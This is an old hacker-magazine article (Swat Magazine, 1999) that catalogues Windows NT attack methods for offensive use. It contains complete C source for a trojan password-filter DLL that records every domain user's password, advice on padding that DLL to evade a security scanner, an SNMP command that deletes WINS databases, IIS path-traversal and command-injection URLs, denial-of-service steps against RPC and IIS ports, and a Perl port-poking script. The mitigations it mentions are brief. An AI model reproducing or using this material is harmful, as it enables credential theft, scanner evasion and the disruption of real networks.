_________ SWAT MAGAZINE ISSUE THIRTEEN: JANUARY 1999 __________ / \___________________________________________/ \ / =WINDOWS NT ATTACK METHODS= \ / By Netw0rk Bug \ ----------------------------------------------------------------------- Exploiting Using DLL Files Windows NT And SNMP The Get Admin Exploit Index Server Exposes Sensitive Material SMB Downgrade Attack REDBUTTON .BAT And .CMD Attacks The IIS /..\.. Problem Truncated Files 100% CPU The Rollback.exe Tool NT PORT PROBLEMS ism.html on IIS Nwserver Remote Administration sharing bug ========================================================================= WINDOWS NT ATTACK METHODS AND EXPLOITS ========================================================================= EXPLOITING USING DLL FILES ========================================================================= Replacing System .dll's System DLLs are called by applications and the registry, and can be replaced with trojaned/virused versions. %systemroot% and %systemroot%\system32 directories have default permissions of 'Everyone' (includes guest) set to 'Change'. This allows DLLs not in use to be replaced. DLLs in use are locked. DLLs are run by programs at various levels during normal operation. A DLL for example can be run with SYSTEM privileges by a service while a user with normal privileges is logged on. This is also true for the MSGINA.DLL, which is the default "Graphical Identification and Authorization" provider for the local console logon, which if replaced, could seriously compromise your entire enterprise. I heard that the %systemroot%\system32 was writeable? Well, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL in that directory. This file typically exists in a Netware environment. First compile this exploit code written by Jeremy Allison (jra@cygnus.com) and call the resulting file FPNWCLNT.DLL. Now wait for the user names and passwords to get written to a file in \temp. ------------- cut -------------- #include #include #include struct UNI_STRING { USHORT len; USHORT maxlen; WCHAR *buff; }; static HANDLE fh; BOOLEAN __stdcall InitializeChangeNotify () { DWORD wrote; fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH, 0); WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0); return TRUE; } LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid, struct UNI_STRING *passwd) { DWORD wrote; WCHAR wbuf[200]; char buf[512]; char buf1[200]; DWORD len; memcpy(wbuf, user->buff, user->len); len = user->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "User = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); memcpy(wbuf, passwd->buff, passwd->len); len = passwd->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "Password = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); sprintf(buf, "RID = %x\n", rid); WriteFile(fh, buf, strlen(buf), &wrote, 0); return 0L; } ------------- cut -------------- If you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to reboot the server after placing the trojan in %systenroot%\system32. ISS (www.iss.net) has a security scanner for NT which will detect the trojan DLL, so you may wish to consider adding in extra junk to the above code to make the size of the compiled DLL match what the original was. This will prevent the current shipping version of ISS's NT scanner from picking up the trojan. It should be noted that by default the group Everyone has default permissions of "Change" in %systemroot\system32, so any DLL that is not in use by the system could be replaced with a trojan DLL that does something else. ========================================================================= WINDOWS NT AND SNMP ========================================================================= [13.0.2] WindowsNT and SNMP Found by Christopher Rouland (from ntsecurity.net) Christopher writes: I have found two significant "features" in the SNMP agent implementations under NT 4.0 Server, and I am sure there are more if I feel like really digging. The first issue I sent in earlier this year to Microsoft and received no response other than "expected behavior" and the second I just found and puts any large NT shop at a serious denial of service (DOS) risk. 1. This first exploit demonstrates the ability via SNMP to dump a list of all usernames in an NT domain (assuming the target box is a DC) or on an NT Server. Here is the simplest NT example I could find to use this: C:\NTRESKIT>snmputil walk public . should be a domain controller or server 2.The second exploit demonstrates the ability via SNMP to delete all of the records in a WINS database remotely, bypassing all NT security. If you understand large scale WINS architecture, you can understand the implications of this. Knowledge of SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with "N" commands (N=number of WINS servers). This is permitted due to the extensive "cmd" set implemented in the WINS extension agent, specifically: 2. cmdDeleteWins OBJECT-TYPE SYNTAX IpAddress ACCESS read-write STATUS mandatory DESCRIPTION "This variable when set will cause all information pertaining to a WINS (data records, context information to be deleted from the local WINS. Use this only when owner-address mapping tables getting to near capacity. NOTE: deletion of all information pertaining to the managed WINS is not permitted" ::= { cmd 3 } Since the SNMP toolset implemented under NT will not do snmp-set-requests, my sample exploit was done using the CMU SNMP development kit under Unix. The command "rnjdev02:~/cmu$ snmpset -v 1 public . a" successfully entirely deleted my WINS database. 3. It appears that there are several other pieces of the LMMIB2 definition that allow for things such as remote session deletion or disconnect, etc, but I have not yet looked into them. 4. Stopping the Problem: The simplest fix is to disable SNMP, or to remove the extension agents through the SNMP configuration in the registry. If you MUST use SNMP, then at least block inbound access to that port. Be aware that using NT's various SNMP agents, a malicious intruder could gain knowledge about your entire network. In fact, they could quite easily gain everything they need to enter your network, except a password -- and those come in due time. BEWARE. ========================================================================= THE GET ADMIN EXPLOIT ========================================================================= The GetAdmin program originated in Russia and has the ability to add users to the Administrators group. No special permissions are needed to execute the program, which interestingly runs through a telnet session as well. Microsoft released a patch that they said stops the attack. If however, you run crash4.exe on the server first and then run GetAdmin, the exploit still works. (All of the executables discussed here are available in the tools section.) ========================================================================= INDEX SERVER EXPOSES SENSITIVE MATERIAL ========================================================================= Index Server Exposes Sensitive Material Found by Andrew Smith One of the components of Index Server (which is the internal search engine component thats part of Internet Information Server.) can expose material of a highly sensitive nature. This component, webhits.exe allows the web server to read files it would normally not be able to read. If the administrator of the server has left the default sample files on IIS, a hacker could easily have the ability to narrow their searches for usernames and passwords. Once an intruder has located an IIS box that has these default samples still on the server, the intruder can use the sample search page to specify only files that have the word password in them and are script files. The URL the hacker would try is http://servername/samples/search/queryhit.htm then the hacker would search with something like "#filename=*.asp" When the results are returned not only can one link to the files but also can look at the "hits" by clicking the view hits link that uses the webhits program. This program bypasses the security set by IIS on script files and allows the source to be displayed. The default path to webhits.exe is: http://servername/scripts/samples/search/webhits.exe Stopping the Attack : Remove webhits.exe or move it from its default location. ========================================================================= SMB DOWNGRADE ATTACK ========================================================================= SMB Downgrade Attack May 6, 1997 - 3pm CST [NTSD] - On the heals of April's RedButton exploit comes yet another demonstration of attacking NT networks. A new program has just been released, complete with source code, that will downgrade a Server Message Block (SMB) negotiation - the standard handshake that occurs when a client attempts to connect to an NT Server. Downgrading the authentication causes the client to send its password in clear text, unencrypted - Ouch. This has been a known possibility for quite some time, however no one has released a working program along with source code up until now. The program actually runs on a Windows based system loaded with Novell ODI style drivers running in promiscuous mode. Once active, the software listens for SMB negotiations, and upon detecting one, the software sends a single packet to the client instructing it to downgrade its connection attempt to a clear text level - at which point the client silently obeys by sending its password in clear readable text. Once this happens this little piece of software actually grabs the password as it travels over the wire and displays it on the screen. The client is successfully connected to the NT Server, and the user remains none-the-wiser that its password has just been grabbed. Under Windows networking, when a client creates a new connection to an NT Server, the clients can be instructed to use a particular authentication mechanism: clear-text or challenge/response. As a result, clients can be instructed to transmit their password in clear text form very easily. Furthermore, if an NT Server requested an encrypted login from the client, NT will authenticate the client, even if the client submits the password in clear text after being told to send an encrypted challenge/response answer. To make matters worse, there is no indication that this is taking place, and there is no way to provide an audit trail on the NT Server that indicates the clients are using clear-text passwords - even though the server has requested encrypted authentication. Perhaps NT should in fact be capable of logging an audit trail on this type of activity (hint hint). A result of this design characteristic, a rogue client could sit on your network silently listening for username and password pairs traveling across the network during authentication. No physical access or user rights and permissions are required for this attack to work! All that's need is a connection to your network between the clients and servers. As I said, this type of SMB downgrade attack has been a known possibility for quite some time - as noted in the Common Internet File System (CIFS) specification (section 8.5.2) - and similar, although not quite the same types of exploits have been demonstrated recently by various college students attempting to show vulnerabilities in Internet Explorer and Windows NT. Previously, NT LAN Manager negotiation and hostile SMB servers were shown to effectively initiate, intercept, or intervene in certain aspects of the client/server authentication process. The person bringing this new program to our attention, David Loudon, has suggested that, "Microsoft could initially create a server patch that would not allow the NT Server to accept clear text passwords. While this does not prevent the exposure of the clear-text password, at least the administrator would be alerted that clients were sending clear-text passwords when requested to send encrypted passwords. To completely resolve this issue, all Microsoft networking clients must be replaced with new code that would never send clear text passwords during the authentication process. "As long as Microsoft networking is enabled on any DOS, Windows 3.1, Windows for Workgroups, Windows 95, or Windows NT clients, users are susceptible to disclosing their clear text passwords to other devices on the physical network. Resolving this issue requires an administrator to update the Microsoft networking components on all affected desktops as soon as a fix is available from Microsoft." Microsoft is definitely aware of this issue, and it appears that this type of functionality was knowingly put in place in order to remain backward compatible with older Microsoft clients like DOS. As a result, don't expect to see a fix for this until Service Pack 3 comes out, and maybe even later. The new CIFS Authentication proposal seems to address this issue and a few other potential nasty security problems, but there is no guarantee the new CIFS specs will make it into SP3 yet. The probable outcome is that the new CIFS Authentication specification, which is being hashed out in a public forum on the Internet, will contain newfound configuration switches that can force the client and/or servers to require either clear text or encrypted negotiations. ========================================================================= REDBUTTON ========================================================================= RedButton --From ntsecurity.net A new program was released this weekend that allows ANYONE with remote access to an NT server (using ports 137, 138, and 139) to connect to that machine, read the registry, and create a new share accessible to the Everyone group. This is a SERIOUS problem that should be guarded against at all costs. A quick test of this new RedButton program shows that it does in fact connect to a remote NT system. Administrators should seriously consider blocking access to ports 137, 138, and 139 on any machines exposed to the Internet. You can also stop the Server service to protect yourself, although doing so eliminates the ability for that server to share resources. Another consideration is to edit the Registry as follows: 1. Open HKEY_LOCAL_MACHINE/CurrentControlSet/Control/SecurePipeServers 2. Create a key called winreg (if it doesn't exist) 3. Set the security on it however you like, but don't give the Everyone group access - but don't define Everyone with NO ACCESS either as this locks out all accounts. 4. Reboot the system RedButton was released by MWC, security consultants, who are maintaining a Web page about the new RedButton software at http://www.ntsecurity.com/redbutton. NOTE: This Web address is ntsecurity.com - not associated with NTSD or ntsecurity.net. We are not responsible for content at thier site. RedButton will: * logon remotely to a target computer without presenting a username and password * gain access to the resources available to the Everyone group * determine the current name of built-in Administrator account * read several registry entries and display the information * list all shares - even hidden shares Microsoft released a HOTFIX for the RedButton problems on May 3, 1997. Be CERTAIN to read the Knowledge Base articles and README files in the distribution directory - this software hotfix installs itself without warning so be careful to understand it completely before proceeding. ========================================================================= .BAT AND .CMD ATTACKS ========================================================================= Sending a command line to the server, such as "http://www.domain.com/scripts/expoit.bat?&commandA+?&commandB" to the server, and then clicking the Stop Button on the browser will cause the server to execute DOS commands on the server's OS. Adding a '+?&time' or '+?&date' to the end of the command, will cause the server to pause for input. Clicking the Stop Button on the browser will interrupt the server making a log entry of the command string executed. ========================================================================= THE IIS /..\.. PROBLEM ========================================================================= A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory. A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute a target script. By default user 'Guest' or 'IUSR_MACHINENAME' has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests. ========================================================================= TRUNCATED FILES ========================================================================= A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file called "target.bat". If the file "target.bat" already exists, the file will be truncated, erasing any previous contents. ========================================================================= 100% CPU ========================================================================= A problem with RPC services causes NT to consume 100% of the CPU time. All that needs to happen is for a person to simply telnet to port 135 on an NT server, and enter a string of ten characters, followed by a carraige return (pressing enter). After trying this, check the Task Manager to confirm the problem -- you'll see rpcss.exe eating up the CPU. Multiple service ports (53, 135, 1031) are vunerable to 'confusion' from this exploit. Try the following steps for verification: 1.Telnet to an NT 4.0 system on port 135 2.Type about 10 characters followed by a 3.Exit Telnet This results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system. When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted. The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted. If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning. The following is modified perl script gleaned from postings in the ntsecurity mailing list at iss.net, to test ports on your system (Perl is available from the NT resource kit): /*begin poke code*/ use Socket; use FileHandle; require "chat2.pl"; $systemname = $ARGV[0] && shift; $verbose = 1; # tell me what you're hitting $knownports = 1; # don't hit known problem ports for ($port = $0; $port<65535; $port++) { if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) { next; } $fh = chat::open_port($systemname, $port); chat::print ($fh,"This is about ten characters or more"); if ($verbose) { print "Trying port: $port\n"; } chat::close($fh); } /*end poke code*/ Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername You cannot kill the rpcss process from the GUI, however you can use the kill.exe program from the NT resource to stop it. You may restart it using the GUI if you like. Any services that were bound to portmapper will have to be restarted as well. Or, you can simply reboot instead. Windows NT 3.51 and 4.0 are both vulnerable to this incredibly simple attack. As far as I can tell, this bug was first reported by Jason T. Luttgens (luttgenj@kic.or.jp), and has been reported back to CERT and Microsoft. NT Versions Affected: 3.51, 4.0 ========================================================================= THE ROLLBACK.EXE TOOL ========================================================================= The information in this article applies to: Microsoft Windows NT Workstation version 4.0 Microsoft Windows NT Server version 4.0 SUMMARY The Windows NT 4.0 Server and Workstation compact discs include a utility called Rollback.exe. Rollback.exe was designed to help computer manufacturers preinstall Windows NT 4.0, and allow end-users to do the final configuration according to the desired role of the computer. Running this utility will remove all registry settings on a system and bring it back to the end of the Character Based Setup portion of the Setup program, effectively undoing everything configured by the GUI portion of Windows NT Setup. WARNING: Do not run this file on a production system! There is no way to recover information erased by running this utility, so anything stored in the registry will be lost. This includes user account information, protocol bindings, application settings, user preferences, etc. MORE INFORMATION If you run Rollback.exe on a production system there is no warning that Rollback.exe removes all system registry entries. Therfore, after you run Rollback.exe there is no system to rescue or to restore as the registry and the Setup.log file no longer exist. The only fix to this problem is to restore the entire system from a current tape back up. Emergency Repair Disk does not restore the system as it requires the Setup.log and specific registry components to be present. Rollback.exe is on the Windows NT compact discs in the following directory: support\deptools\\ ========================================================================= NT PORT PROBLEMS ========================================================================= Port 80 Port 80 has a massive problem in NT 4.0 (see posting below) A lot of people are using the Microsoft Internet Information Server for their corporate web sites and intranets. The following procedure will halt the web services and effectively "kill" whatever web server they may have. 1. telnet the server on port 80 (if 80 is the http port) 2. GET ../.. It definetely works on NT4 + SP1 + IIS2.0. There are conflicting reports of it's effectiveness on 3.51, etc. Microsoft has briefly addressed the problem stating that upgrading to IIS3.0 will solve the problem, however, I have also heard conflicting reports about that. I guess a quick fix would be to move the http server to some other port that would take a long time to guess, or you could set up your NT server to reboot every 1.5 minutes. FTP and POP on NT servers are not encrypted and with the use of a simple packet sniffer it would be simple to snag legitimate logins and passwords by setting the sniffer to the machine and port. Port 19 CHARGEN, or port 19 which dumps endless ascii crap when connected to is a prime target for a flood, suppose that a IP spoof flood comes in (ICMP, UDP whatever) and queries this port a few thousand times... perhaps over a period of hours, the server will be shut down.. Port 53 DNS port 53 is by default an open port on NT, this makes it very easy to play around in this port.. Port 161 SNMP port 161 could be used to enable the NT performance monitor, by which a large amout of data about the targeted server could be obtained very easy. Port 513 & 514 RSH and RCMD ports 513 and 514 respectively can be used to issue remote commands. Port 520 RIP port (520) which uses UDP is another which could be used to spoof commands to a server. (send some mail via spoofed UDP to a forwarding address or whatever..) NT 3.51 the REMOTE.exe and RSHSVC.exe files though RSHSVC is supposed to more secure can be used to issue commands over these servers with no restrictions. This could be potentially bad. ================================================================ ism.html on IIS ================================================================ Other problems related to NT4, there is a default file called ism.html on IIS that can be used for doing remote/local administration on a server. The security of this file is horribly poor, each NT machine has a default account called "Administrator" and half of the servers out there are using the domain names as the password, or the machine name as the password. The FTP accounts on NT servers running virtual servers are very bad also. With "mainhost" being the host machine, for a virtual server: ftp://ftp.mainhost.com/home/www.virtualhost.com/cgi-bin/filename.cgi it will give you access to that file and call it up[ on the screen if you are using a web browser. Now if you then go to the main directory e.g ftp.*.*/home/www.*.*/cgi-bin it then lists the scripts if you're in a web browser u can view all the scripts on screen and check for any bugs, u then pull up the web browser and access those scripts using http://www.vurualhost.com/cgi-bin/filename.cgi? command and you can run the scipt having found the bugs, and this is all from the anonymous ftp login. it works at Microsoft.com as long as you know the directory structure you want to go to, even if the directory is hidden in anonymous ftp. This bug is lethal. ==================================================================== Nwserver Remote Administration sharing bug ==================================================================== With Remote Administration and File Sharing for Netware Networks enabled on a Windows 95 machine, once a remote administrator accesses the system, a shared resource pointing to the hard drive is created to which all users on the same network have access. This share remains available even after the administrator logs off the system. The shared drive is not visible by browsing through the Explorer, but may be found by mapping a network drive to \\computername\C$. This gives read-only access to the entire local hard drive of the sharing computer. +++EOF+++